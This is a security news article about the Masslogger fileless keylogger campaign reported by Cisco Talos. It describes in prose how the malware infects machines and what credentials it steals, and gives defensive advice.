When attempting to access an online account, the only thing that makes someone an authorized user, is a correct username and password combination.
While there are many methods created with the goal to "replace" passwords, people still cannot live without them. From signing in to their accounts and so forth, username and password combination is still the most popular way for most people.
Without a doubt, that will remain a fact for the foreseeable future.
Knowing that fact, and knowing the sensitive information that can hide behind a username and password combination, hackers may utilize tools at their disposal to hack their way in.
And one of the most popular way, is by using a malware capable of logging keystrokes.
Also known as "keyloggers", these software covertly record whatever the target types on the keyboard.
And this time, a trojan malware called 'Masslogger', is hunting passwords by lurking inside email attachments, without having any physical presence inside its victims' machines.
Masslogger runs on Microsoft Windows, written in .NET.
When installed, it will try to steal usernames and passwords from Microsoft Outlook, the Thunderbird email client, NordVPN, Discord and other email and chat services.
It can even steal user credentials from password managers built into Google Chrome, Mozilla Firefox, Microsoft Edge and some other browsers.
The malware campaign first discovered and detailed by Cisco Talos researcher Vanja Svajcer in a blog post, primarily targets business accounts.
In order to avoid detection and removal, Masslogger exists only inside its victims' computer memory.
In other words, Masslogger is a fileless malware that hunts passwords, without leaving a trace on its victims' hard drive.
The only trace Masslogger leaves on a machine, is the original email attachment, which looks harmless until it starts infecting.
This particular malware works by performing a simple task in an indirect and overly complicated way.
To appeal its victim, the attachment file name is chosen according to the email subject, with possible random strings prepended. The attachment filename uses an extension to bypass simple blockers that attempt to block RAR attachments using its default filename extension .rar.
First, when its victim opens a compressed email attachment containing the malware, it will quickly create a compressed HTML file, complete with obfuscated JavaScript file.
A simple HTML page will show up, containing the text "Customer service, Please Wait…"
At the same time, the malware will run a code containing an ActiveX object that has a obfuscated PowerShell code. This initiates a downloader stage, which triggers an initial connection to the download server, which is usually a compromised legitimate host. It's this download server that hosts the next stage of the infection.
The malware then runs a PowerShell loader to decodes the .NET DLL file, to then create a byte array where it stores the Masslogger loader.
And when the DLL is finally loaded as a .NET assembly, the PowerShell loader can start injecting the final payload into its process space and launching the trojan as a fileless malware.
According to Svajcer, this malware is stored in memory as a buffer compressed with gzip.
To avoid this fileless keylogger, people must use antivirus software, and be very careful when receiving unsolicited email attachments, even from people they know. And before attempting to open any attachment, they have to save it first, and scan it with an antivirus.
The other method to avoid infection, is to use a third-party password manager instead of saving passwords inside browsers.
According to Svajcer, this "interesting campaign" affects Windows systems,. with targets that include people in Turkey, Latvia and Italy.
Similar campaigns by the same actor have also been targeting people in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain in September, October and November 2020.
It should be noted that Masslogger trojan campaigns have been previously documented. But in this case, Cisco Talos found one particular campaign that is different, as it uses compiled HTML file format to start the infection chain.
"This file format is typically used for Windows Help files, but it can also contain active script components, in this case JavaScript, which launches the malware's processes," Svajcer explained.
"The observed campaign is almost entirely executed and present only in memory, which emphasizes the importance of conducting regular and background memory scans. The only component present on disk is the attachment and the compiled HTML help file."
"Users are advised to configure their systems for logging PowerShell events such as module loading and executed script blocks as they will show executed code in its deobfuscated format."
Further reading: The 'Invisible Malware', And What You Can Do To Stop Them